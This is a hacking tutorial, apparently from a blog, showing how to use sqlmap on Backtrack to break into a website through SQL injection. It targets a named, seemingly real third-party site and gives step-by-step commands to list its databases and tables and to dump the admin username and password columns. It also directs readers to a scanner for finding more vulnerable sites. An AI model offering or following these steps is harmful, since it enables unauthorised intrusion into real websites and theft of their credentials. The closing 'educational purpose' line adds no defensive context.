In the name of Allah, most gracious and merciful
Assalam O Alaikum guys today i m going to teach you how to use SQLMAP for extracting database details.In this tutorial i am using Backtrack if you want to download backtrack download it here , and the tool we are using is sqlmap.
Let's Begin
Go to backtrack i m using backtrack on my Vmware Workstation. ( Virtual PC ).
Now open SQLMAP you can open it by 2 method's.
First is by putting this command on the terminal >> cd /pentest/web/scanners/sqlmap . Shown in the image below.
And the other is by clicking on Accessories>>Backtrack Tools>>Exploitation Tools>>Web Exploitation Tools>>sqlmap . Shown in the image below.
When sqlmap terminal is opened start injecting now , i m using a Sqli Vulnerable Website , you can search more SQLi Vulnerable Website From The SQLi Scanner click here
We are using these parameter's in this guide
--dbs = Enumerate DBMS databases
-D = DB = DBMS database to enumerate
-T = TBL = DBMS database table to enumerate
-C = Col = DBMS database column to enumerate
--dump = Dump DBMS database table entries
--dump-all = Dump ALL DBMS database Table entries.
when you get your vulnerable website copy that link and open sqlmap terminal and type like this
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 --dbs
and press enter.
it will find the databases of the websites you also use this command for finding only current database
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 --current-dbs
but i prefer to use --dbs for all databases.Once you have your database you're next step is finding the tables of the database.
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms --columns
Where " raahauges_com_com " is the current database of the website we're using. and again press enter and it will collect/gather all the tables of this database.
and after some time it will show you all the tables in the databases . as shown in the image below.
When you done with tables find in which table admin password is stored by guessing it .
and type this command to extract that table.
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms -T admin --columns
and you'll get all the columns of the table admin , now you have to extract the admin username and password.
so type this command
./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms -T admin -C uname,upwd --dump
where "uname" and "upwd" is the column name of my target database. you have to put your target column name here.
and it will show you the username and password detail of the admin . :)
Note : In this website there's no admin table that's why can't show you more screenshots :D
you can try at your own all commands are given here :)
Enjoy , Happy Hacking
Only For Educational Purpose..